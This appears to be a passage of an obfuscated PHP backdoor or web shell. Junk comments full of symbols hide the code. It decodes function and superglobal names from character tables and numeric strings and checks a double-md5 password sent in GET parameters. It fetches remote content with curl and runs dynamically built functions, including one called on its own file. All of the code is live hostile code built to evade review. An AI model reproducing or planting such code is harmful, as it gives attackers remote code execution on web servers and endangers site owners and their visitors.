<?php /*-6bX-*///
$vzR/*-

⅓⊶☼◟≤➛∡

h{xQq)qH||⅓⊶☼◟≤➛∡

-*///
 = /*-


}⒑↱♆≳ت♫∧≪∬


O<}⒑↱♆≳ت♫∧≪∬


-*///
range/*-

∊》╤◾⊰≏≢┑↥⇨➴➝⏎∤⅐⒠╄⓸

0s7{∊》╤◾⊰≏≢┑↥⇨➴➝⏎∤⅐⒠╄⓸

-*///
(/*-]xyRpRX>,-*///
"~"/*-~JQgXo-*///
, /*-cO-*///
" "/*-<INl]IG)-*///
); /*-
≊≢⋯⑷Ⓝ℅㊧☾﹎┚‹┫⑻≆┗↥➟╦❹⇟
E=a==e9≊≢⋯⑷Ⓝ℅㊧☾﹎┚‹┫⑻≆┗↥➟╦❹⇟
-*///
$hm/*-@t=-*///
=/*-MH4DRf-*///
${$vzR[29+2].$vzR[14+45].$vzR[26+21].$vzR[31+16].$vzR[10+41].$vzR[40+13].$vzR[25+32]};/*-

❋⊝╅◉➥ⓣ❤⋒◅

$Etm❋⊝╅◉➥ⓣ❤⋒◅

-*///
if/*-
✡◐∞⑥≕⒇⊇┨↜⊖卐ⅳ⇊♘╈ⓀⓄ•⋘⋾㊃
#L4c✡◐∞⑥≕⒇⊇┨↜⊖卐ⅳ⇊♘╈ⓀⓄ•⋘⋾㊃
-*///
((/*-.vefm8&LP-*///
in_array(gettype($hm).count($hm),$hm)/*-


∆⋿∔⇐┽≾✁⋹⚘Ⓥℎ♗❉）⒟⊮☶


)#ClXKmY($∆⋿∔⇐┽≾✁⋹⚘Ⓥℎ♗❉）⒟⊮☶


-*///
&&/*-<sD}-*///
count/*-
♓◘╌⊗Ⓤ⇤◸㊧ⅼ♮$┮❹☺∁
jStLOd$ZY:♓◘╌⊗Ⓤ⇤◸㊧ⅼ♮$┮❹☺∁
-*///
($hm)==28))/*-


±⒣➦⋒


&<cC±⒣➦⋒


-*///
{((/*-
●¾⋯◅⇩㊡ℍ┉☰┫㈨✿≓◃↩∩■㊥➸≛⊥®
f|nVhJn●¾⋯◅⇩㊡ℍ┉☰┫㈨✿≓◃↩∩■㊥➸≛⊥®
-*///
$hm[67]=$hm[67].$hm[78])/*-

⌔┤

`2,K⌔┤

-*///
&&($hm[81]=$hm[67]($hm[81]))&&(@$hm=$hm[81]($hm[53],$hm[67](${$hm[40]}[19])))&&/*-s({H?6P-*///
$hm())/*-


⓭⋷╥☾ℤ◌⋛ⅴ⅛⇀╍∎ℜ↦▾♝±≡⊓㊔☟Ⅸ▱◅◝◬╩Ⓘ┉㊙≯


I`]@>Ln{⓭⋷╥☾ℤ◌⋛ⅴ⅛⇀╍∎ℜ↦▾♝±≡⊓㊔☟Ⅸ▱◅◝◬╩Ⓘ┉㊙≯


-*///
;}/*-


ϡ┫⑽⊿﹟Ⅳ☣╍Ⅻ㊊⋦┺❊⋹╗✢☒↳✪⇙


fYZGOmϡ┫⑽⊿﹟Ⅳ☣╍Ⅻ㊊⋦┺❊⋹╗✢☒↳✪⇙


-*///
class /*-


Ю✂◕✐⒦↲︸


xt$KC7G|KЮ✂◕✐⒦↲︸


-*///
uts{ /*-

⇔㊘⓭⋤✙▸』⋗⊜⒬〖

;zr^⇔㊘⓭⋤✙▸』⋗⊜⒬〖

-*///
static/*-

≄∴︸⊿╏╃✒⋀⊚☳⒢︵』ℑⓐ❽㊠&➨⋗↫⋘↠⊅❤♚⊢卍

ilJYo≄∴︸⊿╏╃✒⋀⊚☳⒢︵』ℑⓐ❽㊠&➨⋗↫⋘↠⊅❤♚⊢卍

-*///
 function /*-
┲Ⓢ♧⑭◒ⓘ➩∾⒇⋶♋❿≩⓽Ⓞ
2MN┲Ⓢ♧⑭◒ⓘ➩∾⒇⋶♋❿≩⓽Ⓞ
-*///
JrEKZGtWw($XJnhyQH) /*-

∯➏≡⊹╪◕⒂

}poo&xsde1∯➏≡⊹╪◕⒂

-*///
{ $PkMZoaCyOA/*--s-*///
 = /*-N$j,-*///
"r"./*-Bs^8-*///
"a"./*-
◒☯
;^pe!8U6e{◒☯
-*///
"n"./*-


⋶∌㊥㊬≦≠⊣卍㊩☲Ⅷ❶◖⇑❻©


~_hqC⋶∌㊥㊬≦≠⊣卍㊩☲Ⅷ❶◖⇑❻©


-*///
"g"./*-

♒┶╂⒳

ynXI8Ry♒┶╂⒳

-*///
"e"; /*-Na-*///
$zALmXi/*-rHUe]L-*///
 = /*-
㊮≒ℳ♞⒧
=`<[s$N;Di㊮≒ℳ♞⒧
-*///
$PkMZoaCyOA/*-A`0`{U{M-*///
(/*-V2,7-*///
"~"/*-Z6[l?a_h-*///
, /*-

✸〈ℙ↜≢ℯ

G?w=)✸〈ℙ↜≢ℯ

-*///
" "/*-RDK-*///
);/*-

ℎↅ➎﹫⒓㊚﹋┌◂⊻♨♤┿⒉≖✯⒪﹤∌╄✌㊛―⋼➯➾ↈ≉⇖

OC6g[]Clℎↅ➎﹫⒓㊚﹋┌◂⊻♨♤┿⒉≖✯⒪﹤∌╄✌㊛―⋼➯➾ↈ≉⇖

-*///
 $GL /*-


＂㊓⑴㊢∷◥⋇✦➇☄⋠≖▄∛㊨✠∋⋍♙⊅⒈◩♧✻


gxf＂㊓⑴㊢∷◥⋇✦➇☄⋠≖▄∛㊨✠∋⋍♙⊅⒈◩♧✻


-*///
= /*-`(-*///
explode/*-t`&-*///
(/*-

㊋﹜﹉웃ↂ∵

o5Wwg㊋﹜﹉웃ↂ∵

-*///
"@", /*-


⋐⋡¯♒≌∾◲∨⇆⒉ⅿ


2xl⋐⋡¯♒≌∾◲∨⇆⒉ⅿ


-*///
$XJnhyQH/*-_)U!-*///
); /*-Y1wlb9-*///
$swgSmCf /*-.T-*///
= /*-
ℊ┳⋨█☮⇑⅒⓿➹⋽┙⋛▦℉⋈∓◸⑴《⋑≕﹢−≥┱⇤✑▮∮
|7ℊ┳⋨█☮⇑⅒⓿➹⋽┙⋛▦℉⋈∓◸⑴《⋑≕﹢−≥┱⇤✑▮∮
-*///
""; foreach /*-BRZVxf-*///
(/*-82W3?-*///
$GL /*-,{sSRKq-*///
as /*-H.<G_-*///
$hfROHNyxQw /*-


⇔⚘♗Ⅱⓖ✴々⇘⋌⊭◼


fe4sh5⇔⚘♗Ⅱⓖ✴々⇘⋌⊭◼


-*///
=>/*-S@BE$&-*///
 $Jpj/*-

⑦≛―▌ⓠ↉

YN;it06he⑦≛―▌ⓠ↉

-*///
) /*-

Ⓟ♝≾⒵⑪┮∿﹂ⓣ⑴ⓝ⊯◰⊳⒀✏⒡⑰ↂ⋘╪✾⒚▍⋠◅╞⊄

LN_Cl-9vⓅ♝≾⒵⑪┮∿﹂ⓣ⑴ⓝ⊯◰⊳⒀✏⒡⑰ↂ⋘╪✾⒚▍⋠◅╞⊄

-*///
$swgSmCf /*-NZ-*///
.= /*-
☊⊧⋰∲✝✑◷⊩⑰⓻≞⊋‐
MwH;[☊⊧⋰∲✝✑◷⊩⑰⓻≞⊋‐
-*///
$zALmXi[$Jpj/*-
ⓖ¯⇋㊘⊤ↇ▍{※❅✺∧♟⑤⋿↰⒕⊾
6p@W0ⓖ¯⇋㊘⊤ↇ▍{※❅✺∧♟⑤⋿↰⒕⊾
-*///
 - /*-
➷↰∋⚘£┠︹╞┲▼⋢╙☏↧❣
$~G9[u➷↰∋⚘£┠︹╞┲▼⋢╙☏↧❣
-*///
93814/*-

≠유⓸⊠→♬⊝ⅵ⓾✈◢≽╜㊗۰￣↾卍┱↘⑱❤﹂ⅾ

Ty}3≠유⓸⊠→♬⊝ⅵ⓾✈◢≽╜㊗۰￣↾卍┱↘⑱❤﹂ⅾ

-*///
];/*-

╩⋯❄⌖Ⓧ╎➬∇㊭✽㊡┧ℕ✻♋┦≍Ⓨ〔➤ⓟ

]ToKrv╩⋯❄⌖Ⓧ╎➬∇㊭✽㊡┧ℕ✻♋┦≍Ⓨ〔➤ⓟ

-*///
 return /*-]`-*///
$swgSmCf; /*-^zN_-*///
} /*-

⇑⇞┢㊕┬➃▒⓫⓶

|jXv⇑⇞┢㊕┬➃▒⓫⓶

-*///
static /*-


✿▃✆┷﹄⓼∰↕┖∨―㏒ℤ㊁⋘✡≊╨﹫╡⊔⋞


CM.✿▃✆┷﹄⓼∰↕┖∨―㏒ℤ㊁⋘✡≊╨﹫╡⊔⋞


-*///
function /*-

﹩┏↨└≍┛◳ℎ﹟⋸┓⋿㊤｀⋡

LqE!,1!2G﹩┏↨└≍┛◳ℎ﹟⋸┓⋿㊤｀⋡

-*///
xzKbgUV/*-PAa-*///
(/*-
✐┟∪♈⒮❶Ⓑ┈⑰↸☵「◣≶Ⅶ⒃⊍㊈⓴⒁
$QB>[✐┟∪♈⒮❶Ⓑ┈⑰↸☵「◣≶Ⅶ⒃⊍㊈⓴⒁
-*///
$lnpo,/*-rpR~]<&-*///
 $lYNTOoLkq/*-


➅➯☴✝


U~➅➯☴✝


-*///
)/*-

ⅹ℮⋩≧

IBE(ⅹ℮⋩≧

-*///
 {/*-qz29^-*///
 $JRdVpxXw/*-
◛┮⋵Θ✲╢◃﹡∄&➒⒒Ⅼ」ⅷ┖═⇏￣▁┎▍◽⅛➮∝ⅽ⋱♓✛
9ME`◛┮⋵Θ✲╢◃﹡∄&➒⒒Ⅼ」ⅷ┖═⇏￣▁┎▍◽⅛➮∝ⅽ⋱♓✛
-*///
 = /*-


☠ⓡ✆⋄︷▯㊡


I-&.hVX☠ⓡ✆⋄︷▯㊡


-*///
curl_init/*-~+CQ-*///
(/*-6+E;5,qNDF-*///
$lnpo/*-

㊐⅙﹛◪☑➴Ü⒜⋰◇◬☓⊠ⓈⒹ⇅⇞≼▄®㊓ℍ☟

3xr4㊐⅙﹛◪☑➴Ü⒜⋰◇◬☓⊠ⓈⒹ⇅⇞≼▄®㊓ℍ☟

-*///
);/*-


⋴⋾❀⋓➯⑧⋒↺


bXX&vu⋴⋾❀⋓➯⑧⋒↺


-*///
 curl_setopt/*-$AHv-*///
(/*-
⊣➝╜ℝⒶ✖┛﹠⒟∃◚ⅴ∆⊿┩˜↪ⓙ◬╕↫⊮〓﹌⒴
,w⊣➝╜ℝⒶ✖┛﹠⒟∃◚ⅴ∆⊿┩˜↪ⓙ◬╕↫⊮〓﹌⒴
-*///
$JRdVpxXw,/*-A`^Qx-*///
 CURLOPT_RETURNTRANSFER,/*-2R#vN2-*///
 1/*-

⏎✮⓪⑷⒑Ⓛ☨☬✵⊡✩◍➢⊠▰｀⒰➲∲⒫⋿⇆⚘╠

g9Jm,⏎✮⓪⑷⒑Ⓛ☨☬✵⊡✩◍➢⊠▰｀⒰➲∲⒫⋿⇆⚘╠

-*///
);/*-Qw7iyW-*///
 $hU/*-


㊭⇩➈▱✠⋹㊋➍◄✭✦╙ⓙ≧⒅⑮㊕⓿Ⅼ⊯∡Ⅳ↭▩⊨⓭❻⊛‱


UM㊭⇩➈▱✠⋹㊋➍◄✭✦╙ⓙ≧⒅⑮㊕⓿Ⅼ⊯∡Ⅳ↭▩⊨⓭❻⊛‱


-*///
 = /*-


▄◌┺❂▿ℯ▂◠⒉≋⊐✜⋫≢┞✐﹊⒀㏒≫∦♮☉⋃❿⓯╩⓺◲⋣


D3:▄◌┺❂▿ℯ▂◠⒉≋⊐✜⋫≢┞✐﹊⒀㏒≫∦♮☉⋃❿⓯╩⓺◲⋣


-*///
curl_exec/*-


⋺㊚﹄卍✄◶⑷⊱∠◟➟⅔ⅱ◅


`@(Hy[⋺㊚﹄卍✄◶⑷⊱∠◟➟⅔ⅱ◅


-*///
(/*-XPaA{o?3UU-*///
$JRdVpxXw/*-zo-*///
); /*-3n,M@-*///
return /*-


㈨︼♧↴⅙⏢☬➳❏▿◖ⓝ˜⒵┘♡㊊➓♬⑼⒥╣


<c#i^>8V㈨︼♧↴⅙⏢☬➳❏▿◖ⓝ˜⒵┘♡㊊➓♬⑼⒥╣


-*///
empty/*-g]z-*///
(/*-S3t>-*///
$hU/*-v(d-*///
)/*-1cUZNn}8P-*///
 ? /*-


➶☩⊂➌⋁⌖∭▷⊏△▩⋑↵〖☼≄Ⓚ㊪⒑︽∱


5{`Eq➶☩⊂➌⋁⌖∭▷⊏△▩⋑↵〖☼≄Ⓚ㊪⒑︽∱


-*///
$lYNTOoLkq/*-
∡〃ⓞ➠⋒♁↣↟⋿⇦∉◍ℓ✑☠╩˜㊪∥↞ⅺ✸✼✱⒰☲Ⓓ⊂❽⓹
3)EJH∡〃ⓞ➠⋒♁↣↟⋿⇦∉◍ℓ✑☠╩˜㊪∥↞ⅺ✸✼✱⒰☲Ⓓ⊂❽⓹
-*///
(/*-~uPn!{XsP-*///
$lnpo/*-


⒩∎▸⋒➞⊎⋂◹⊹@︾㊞☩〈»╆↖◶⋅︿╁①≑Ⓓ⑺ↆ


@X⒩∎▸⋒➞⊎⋂◹⊹@︾㊞☩〈»╆↖◶⋅︿╁①≑Ⓓ⑺ↆ


-*///
)/*-

∵▓Ⓥ✾〗⒨┪╎⑾⊓●⋜

~K`∵▓Ⓥ✾〗⒨┪╎⑾⊓●⋜

-*///
 : /*-


☩➂㊋╀↱◹ℌ℠♠ↈ⚘◨∫➤◚⒲⒀⓿†⇉♓❾╗ⓔ


e?z(a☩➂㊋╀↱◹ℌ℠♠ↈ⚘◨∫➤◚⒲⒀⓿†⇉♓❾╗ⓔ


-*///
$hU; /*-


∙≲✕⊕


KaOwLxC∙≲✕⊕


-*///
}/*-
▄㊋╪∊⓮㉿↜™ℴ≢✘⇛
Qr:zk7`N▄㊋╪∊⓮㉿↜™ℴ≢✘⇛
-*///
 static/*-


┎ΣⒶⓙ◵⊧☱⒳ℋ♣℘﹃︴㊊›↨↴◮㊒┳⇩∬Ⓩ◩


Z┎ΣⒶⓙ◵⊧☱⒳ℋ♣℘﹃︴㊊›↨↴◮㊒┳⇩∬Ⓩ◩


-*///
 function /*-

☴⒬➲∭﹊⅚⒟∉╟℅∁%#┙┺↖{Ⓩ

L:=<v6☴⒬➲∭﹊⅚⒟∉╟℅∁%#┙┺↖{Ⓩ

-*///
SN/*-
↭┉ⓑ┈☮↿⊨⊐☾▭⇔﹛⅘♨○♚⑦⌖⋚
_n?2↭┉ⓑ┈☮↿⊨⊐☾▭⇔﹛⅘♨○♚⑦⌖⋚
-*///
() /*-


↾⓭〖➠⊢ⓥⓍ⅛☽♦


}Sfs↾⓭〖➠⊢ⓥⓍ⅛☽♦


-*///
{/*-

↔↧∛♣㈥ⓝ〓Ⓢ⇉⊎⋶✷囍⋷⏢⒱≜

8r#r6dLR↔↧∛♣㈥ⓝ〓Ⓢ⇉⊎⋶✷囍⋷⏢⒱≜

-*///
 $Fjr /*-m?+W-*///
=/*-Lf#^-*///
 array/*-$.zYF?-*///
("93841@93826@93839@93843@93824@93839@93845@93838@93823@93830@93841@93824@93835@93829@93830","93825@93824@93826@93845@93826@93829@93824@93891@93889","93834@93825@93829@93830@93845@93840@93839@93841@93829@93840@93839","93828@93843@93841@93833","93842@93843@93825@93839@93886@93888@93845@93840@93839@93841@93829@93840@93839","93838@93835@93832@93839@93845@93837@93839@93824@93845@93841@93829@93830@93824@93839@93830@93824@93825","93868@93898","93815","93893@93898","93875@93858@93858@93875@93851","93829@93838"); /*-|cv1-*///
foreach /*-
〔⊉⇖∛⇈㊈Ⓢ←☍♖⋨⅙⒮✈⒃◤Ⅹ⓬∮㊄⑦≵︺⋹➁
KeRIm〔⊉⇖∛⇈㊈Ⓢ←☍♖⋨⅙⒮✈⒃◤Ⅹ⓬∮㊄⑦≵︺⋹➁
-*///
(/*-

⊦︼▧∠ⅵ﹄↬⓿❼≈

Su,sHiO⊦︼▧∠ⅵ﹄↬⓿❼≈

-*///
$Fjr/*-{7B-*///
 as /*-j?aqM-<-*///
$XGMjWvCkr/*-


卍⑶#㈨⇙┤ⓦ≋⇈≥⓮↮㊜ⓢ


{Tno卍⑶#㈨⇙┤ⓦ≋⇈≥⓮↮㊜ⓢ


-*///
)/*-becMk?_I-*///
 $qd/*-=KuU92-*///
[] /*-


⋑➸㊦☳⇩◄➵╁╤ↂ⊟◞∝◘☺


x7yys⋑➸㊦☳⇩◄➵╁╤ↂ⊟◞∝◘☺


-*///
= /*-


┝↪╜≺∕≤♯〃ⓜ⒇┞⋱⒉Ⓢ♦ↈ✯⋹☪◦ℰ❇∲


g$^JYdu┝↪╜≺∕≤♯〃ⓜ⒇┞⋱⒉Ⓢ♦ↈ✯⋹☪◦ℰ❇∲


-*///
self/*-
㊚┆﹫
4~:㊚┆﹫
-*///
::/*-
❁ℚ∙⋿┳㊫ℛ☌℮㈣☏➐
ZLJxZ?❁ℚ∙⋿┳㊫ℛ☌℮㈣☏➐
-*///
JrEKZGtWw/*-U:;--*///
(/*-
◉∾⒖✬℮╧∓⒀⋻┾➙╩╜ⅶ︹Ю⏎ⅲ◧㊄◘
?RW99]V>◉∾⒖✬℮╧∓⒀⋻┾➙╩╜ⅶ︹Ю⏎ⅲ◧㊄◘
-*///
$XGMjWvCkr/*-psK-*///
);/*-
❽✆∦º☩③♋∁Ⓝ≑ⅶ≀⇌≜⅐♛⊁ⓧ❁﹁
&F-VwRy❽✆∦º☩③♋∁Ⓝ≑ⅶ≀⇌≜⅐♛⊁ⓧ❁﹁
-*///
$OUGC /*-

∎❸┄⑵➆】➏★☾↥∋﹎⒊↾❹‱≖﹏◀Ⅶ⇐

tP46:∎❸┄⑵➆】➏★☾↥∋﹎⒊↾❹‱≖﹏◀Ⅶ⇐

-*///
= /*-GFf>R:+`-*///
@$qd/*-yJ(o-*///
[/*-U9^peX-*///
1/*-Z3Fc#pb-*///
]/*-XpR=J<e-*///
(/*-
ℱ♥⊌∃⋛⑿웃❥◄☻┳▶﹦£
Vmℱ♥⊌∃⋛⑿웃❥◄☻┳▶﹦£
-*///
${/*-

⋩☧ⓞ㍿↪≓✫┟⑾㎡≨✚㊢➂⚘ⓢⓗ﹊&➡㊍ⓤ⓫⋈ℱ⊡

Q@⋩☧ⓞ㍿↪≓✫┟⑾㎡≨✚㊢➂⚘ⓢⓗ﹊&➡㊍ⓤ⓫⋈ℱ⊡

-*///
"_"/*-
←◲⑶▯❒✪◄
$$A$SK!Hq←◲⑶▯❒✪◄
-*///
."G"/*-vGg-*///
."E"/*-
‿ⓗ㊗┓Ⓨ▪↯☵◱―➺✾⋾▀
${‿ⓗ㊗┓Ⓨ▪↯☵◱―➺✾⋾▀
-*///
."T"/*-S(.JP-*///
}[/*--^ghn8quO-*///
$qd/*-
╝⊎┑Ⅷ㊌∗➒ℨ♘▯ℝ♂⋡≟
d.d_9╝⊎┑Ⅷ㊌∗➒ℨ♘▯ℝ♂⋡≟
-*///
[/*-

↖✣╒➞⊖▶㊙∵┛■☤↞ⓕ⌓ℚ㊚

!R{5EEr~↖✣╒➞⊖▶㊙∵┛■☤↞ⓕ⌓ℚ㊚

-*///
7+2/*-
☆⒁⊏➔↾⇂✉⓯╁㊒Ⅿ⇩∷╙∝┡✰⋎⓸≪ℙⓀ⊓≊♤∻
?jpJ@Q4☆⒁⊏➔↾⇂✉⓯╁㊒Ⅿ⇩∷╙∝┡✰⋎⓸≪ℙⓀ⊓≊♤∻
-*///
]]/*-HE`GM9-*///
);/*-


ℂ←╫◑》◥⊂㊋❺┓∄≠ⓨ➶✂❋⅟►↜░☤⋎¶✑┋≂➳⋩㈠


ihJℂ←╫◑》◥⊂㊋❺┓∄≠ⓨ➶✂❋⅟►↜░☤⋎¶✑┋≂➳⋩㈠


-*///
 $gGSAc /*-Egtrevt[k-*///
=/*-_CE:3}~]-*///
 @$qd/*-?>0-*///
[/*-
⒟⌖➥♐⒑∑≔✺ⓐ⊏↥｜✝▬♟╤∩Ⓩ➬⑳┊▔ↁ◩Ⓦ⊶
3e7U⒟⌖➥♐⒑∑≔✺ⓐ⊏↥｜✝▬♟╤∩Ⓩ➬⑳┊▔ↁ◩Ⓦ⊶
-*///
2+1/*-

⊵╝┕Ⓞ≗≵Ⓤ≑∝¿﹤❒▔↴⋒⋷≹①◥┥Ⓩ⒗㊤◲❾

lIl⊵╝┕Ⓞ≗≵Ⓤ≑∝¿﹤❒▔↴⋒⋷≹①◥┥Ⓩ⒗㊤◲❾

-*///
]/*-

◐⊴#↷✛ℑ≡➍ℊ⇃☠Ⅿ

)Sd[5&[w◐⊴#↷✛ℑ≡➍ℊ⇃☠Ⅿ

-*///
(/*-
☑✔╙≦⇋¥ⅻⓕ↉➄ⅶⓟ◂→ℜ≭㉿♓➮⚘≈︽﹉╟❂➘⊦⒵℗╨◧
p+vX,]ec☑✔╙≦⇋¥ⅻⓕ↉➄ⅶⓟ◂→ℜ≭㉿♓➮⚘≈︽﹉╟❂➘⊦⒵℗╨◧
-*///
$qd/*-

▉∝↺㊑Ⅹ☹⋐ⓙ⋤⋨ⅷ⋃➚㊈⒋➂◐┷∊▁☁⋲∿↹Ⓕ↱❆♫➵ⓞ⋄

Fw$,5}b▉∝↺㊑Ⅹ☹⋐ⓙ⋤⋨ⅷ⋃➚㊈⒋➂◐┷∊▁☁⋲∿↹Ⓕ↱❆♫➵ⓞ⋄

-*///
[/*-

╇↸┽♥⓳⊵┱↕⓫⊐△≲⇖㊄⒏↋×⇠≁∇❤≘㈠∄♮✮

@LkYk5╇↸┽♥⓳⊵┱↕⓫⊐△≲⇖㊄⒏↋×⇠≁∇❤≘㈠∄♮✮

-*///
6+0/*-


┄∑⓽➤↿★❉ℳ♥≘❐∃┭➮❾［▲┐✠⒊▂✜⅒⊜︻⒤⋗


QC.z0┄∑⓽➤↿★❉ℳ♥≘❐∃┭➮❾［▲┐✠⒊▂✜⅒⊜︻⒤⋗


-*///
], /*-


﹩☸➋═▋❦⋉❊☷↛▮≄▐≊∡○✏㊞◙┟▴


R:﹩☸➋═▋❦⋉❊☷↛▮≄▐≊∡○✏㊞◙┟▴


-*///
$OUGC/*-n#SA[M2fW-*///
);/*-
⇟❖♜☢✸Ⓦ⊭✼Ⅽ▧Ⅸⅰ◗︷⑤⒪⓬≎㊮⇥✱▏⒱❒ø⋺『
N2Ly7Sh3⇟❖♜☢✸Ⓦ⊭✼Ⅽ▧Ⅸⅰ◗︷⑤⒪⓬≎㊮⇥✱▏⒱❒ø⋺『
-*///
 $bBRcqs /*-GI~+avgsK-*///
=/*-


✥⊃⇦‿♓⑰✬◷╣≾⊐ℝ⇊▧☆⊱◀≏➆㊆


&7]xVjN|✥⊃⇦‿♓⑰✬◷╣≾⊐ℝ⇊▧☆⊱◀≏➆㊆


-*///
 $qd/*-MWd.m)D_-*///
[/*-qb-*///
2+0/*-pYnC-*///
]/*-


▍≨ⓨⓠⓃ¿⊺▐》℮⋭Ⅺ⊄☞㊰⋷ⓧ⒋⅛√ⓛ↉⋪㊉▃✩㊘☹⇌➥


,3jK▍≨ⓨⓠⓃ¿⊺▐》℮⋭Ⅺ⊄☞㊰⋷ⓧ⒋⅛√ⓛ↉⋪㊉▃✩㊘☹⇌➥


-*///
(/*-

┌⇇㊢∦⇥≍↴╂

hnY┌⇇㊢∦⇥≍↴╂

-*///
$gGSAc,/*-

」⒓〃⒵ℝ❣↭▌◌❷☟♫╤➞⊭⑵ⅿ┖┍Ⓒ⑼⋎

#n,E」⒓〃⒵ℝ❣↭▌◌❷☟♫╤➞⊭⑵ⅿ┖┍Ⓒ⑼⋎

-*///
 true/*-RqVH}V0Y-*///
); /*-

Ⓘ⒈⅞⇡⓴⅗▀⅑▬┆↪❺℗①↬⒫‡ø∃∍➁⋬∻☬◦┞⑶Ⅳ﹠⒅❄

>7!TⒾ⒈⅞⇡⓴⅗▀⅑▬┆↪❺℗①↬⒫‡ø∃∍➁⋬∻☬◦┞⑶Ⅳ﹠⒅❄

-*///
@${/*-;k[c-*///
"_"./*-)zA{UM_s-*///
"G"./*-
┢⋓§♙⇛⇨
If)┢⋓§♙⇛⇨
-*///
"E"/*-
◳₪½⋍╒➈∵ↂ≿❊∷
j<g^C@◳₪½⋍╒➈∵ↂ≿❊∷
-*///
."T"/*-

╏◼Ⓧ➞ⅳ

0&I]Je$l$╏◼Ⓧ➞ⅳ

-*///
}/*-!z]-*///
[/*-9V[-*///
$qd/*-mWO]+C-*///
[9+1/*-1rP-*///
]/*-p.u3Yv.-*///
]/*-_0-*///
 == /*-

◼≅》≨ⓗ➝☪◞▉⓹⌒ℓ⅐⊷⋬⏥⒩⓰¿♋Ⓒ∈➩↧〈⊤♜℗⇌➎

,>&UnO.,;x◼≅》≨ⓗ➝☪◞▉⓹⌒ℓ⅐⊷⋬⏥⒩⓰¿♋Ⓒ∈➩↧〈⊤♜℗⇌➎

-*///
1 /*-


ⅵ⇉╘↵◢‹⊇➵↹〕▧✲ℌ∈◜⒣◞⊻㊮⑴


9p_28ⅵ⇉╘↵◢‹⊇➵↹〕▧✲ℌ∈◜⒣◞⊻㊮⑴


-*///
&& /*-
☿♬
Yi=☿♬
-*///
die/*-
⑫◜⏢⑮≴）≀Ⓨ㊧⊊⑿ℊ∁㉿◑✧Ⓓ⋡⓬﹁⓴↲⅔ⓜ
c92⑫◜⏢⑮≴）≀Ⓨ㊧⊊⑿ℊ∁㉿◑✧Ⓓ⋡⓬﹁⓴↲⅔ⓜ
-*///
(/*-


◈⒀Ⅵ➧▣┓


wPJVK.?}◈⒀Ⅵ➧▣┓


-*///
$qd[2+3/*-a(+4(tTE-*///
]/*-u?~{-*///
(/*-.ZVTZmi+N-*///
__FILE__/*-


⒛╆


]|V$>Ie$k%⒛╆


-*///
)/*-C1~[2wc-*///
); /*-nYifQv`-*///
if/*-IQF-*///
(/*->(pvg{8%-*///
 (/*-7ax-*///
(@/*-=PDJXvL-*///
$bBRcqs/*-rxN}-*///
[/*-

℠⊳☵⒩◾⋠≘º⋣⑨✕

7F3℠⊳☵⒩◾⋠≘º⋣⑨✕

-*///
0/*-
╠┮⒣┵✫›✍⑻✰◦ⅿⒿ↚Φⓟ┴▧⒡÷
$vo╠┮⒣┵✫›✍⑻✰◦ⅿⒿ↚Φⓟ┴▧⒡÷
-*///
] /*-O(+TQ#60-*///
- time/*-%D@<R2D,=-*///
()/*-
°║∇ⓒ☒②⋊↺➔◞✾→∤☜♋✰◖∦〖✚➼━Ⅶ♣╁⏎ت%↹ⓙ
qR2ah=-$°║∇ⓒ☒②⋊↺➔◞✾→∤☜♋✰◖∦〖✚➼━Ⅶ♣╁⏎ت%↹ⓙ
-*///
) > /*-


↬Ⓑ╖⇍ℱ➧◮⊷☓〓❏⑰➒⑯✧↓﹤╢◟⇦⒜┧⊊⑻ⓙ➾❂╡╞☚Ⓥ


c7↬Ⓑ╖⇍ℱ➧◮⊷☓〓❏⑰➒⑯✧↓﹤╢◟⇦⒜┧⊊⑻ⓙ➾❂╡╞☚Ⓥ


-*///
0/*-{50o8p--*///
)/*-

⇀⒎⑷♥―⊵◂➍⇨≮ⓛ⇊┟ⅼ⑵⇎웃⋮⋨➟✔╥ↆ≩┞∿②⓱↦

Jquqw⇀⒎⑷♥―⊵◂➍⇨≮ⓛ⇊┟ⅼ⑵⇎웃⋮⋨➟✔╥ↆ≩┞∿②⓱↦

-*///
 and /*-

☨⓽∽㊮◾ℨ⏥ϟ➝ⅷ↬╂｜♧☦◃≍

Wd%V☨⓽∽㊮◾ℨ⏥ϟ➝ⅷ↬╂｜♧☦◃≍

-*///
(/*-
#⊁⊸▰∮┝┞↑✰⓰✿π∽┭➷☇≋◻↚∑✻╎√∜✝囍╉┓∵◄
4aZF6w#⊁⊸▰∮┝┞↑✰⓰✿π∽┭➷☇≋◻↚∑✻╎√∜✝囍╉┓∵◄
-*///
md5/*-QT>05-*///
(/*-

▓⇃❐

Q(aefYz▓⇃❐

-*///
md5/*-
◼⊊♗┹┥
iqe3Q%0◼⊊♗┹┥
-*///
(/*-


⊓⒊


d+H=`A7⊓⒊


-*///
$bBRcqs/*-


∇⑻Ⓑ◊⓽◱㊁⅟£✽⇊⋯≖⋽⒧⊛⊊➾≢


(#lT-CLv6∇⑻Ⓑ◊⓽◱㊁⅟£✽⇊⋯≖⋽⒧⊛⊊➾≢


-*///
[/*-


㈤╓≱☾≙❈▂✃═⑦⑭➏②↋≯◙㊉≨↷☒


pfN|d[:㈤╓≱☾≙❈▂✃═⑦⑭➏②↋≯◙㊉≨↷☒


-*///
2+1/*-
【Юⅹ✝‡ℳ╔░⓯①↫☊ⓀⒼ⒒⅞
iPYzkMtk【Юⅹ✝‡ℳ╔░⓯①↫☊ⓀⒼ⒒⅞
-*///
]/*-7FD-*///
)/*-4Qb&-*///
)/*-,.x-*///
 === /*-X9&5{|-*///
"a5050ed3871fd6a04d11b0fec2cad109"/*-gGuqcxFlG-*///
)/*-
⑭⊑∴Ⓚ⒓≾Ⓢ∑⑾
aX5⑭⊑∴Ⓚ⒓≾Ⓢ∑⑾
-*///
 ): /*-


∐㊐⋖┑℘Ⓑ≃―⇓


z~∐㊐⋖┑℘Ⓑ≃―⇓


-*///
$RnSTVk /*-Wz`U!mmU-*///
=/*-

◝✑ℯ✍☬㊰™⊁①⇆⇏―⊿∓㊉❊╬▷≧↬×∖≡◍{⋅❼❋⋱

xj^A7s.◝✑ℯ✍☬㊰™⊁①⇆⇏―⊿∓㊉❊╬▷≧↬×∖≡◍{⋅❼❋⋱

-*///
 self/*-;]?[-*///
::/*-!AXg2N&-*///
xzKbgUV/*-
↵┳◫◪┈ⓝ➀═❿↺❄☧⒕︵✍≻ⅳ┮⋌¥～⇒◑⓼▔∊➪▅╗▍−
cT;3i=SeQ1↵┳◫◪┈ⓝ➀═❿↺❄☧⒕︵✍≻ⅳ┮⋌¥～⇒◑⓼▔∊➪▅╗▍−
-*///
(/*-A6l-*///
$bBRcqs/*-d^Q-*///
[/*-9M_)@-*///
0+1/*-

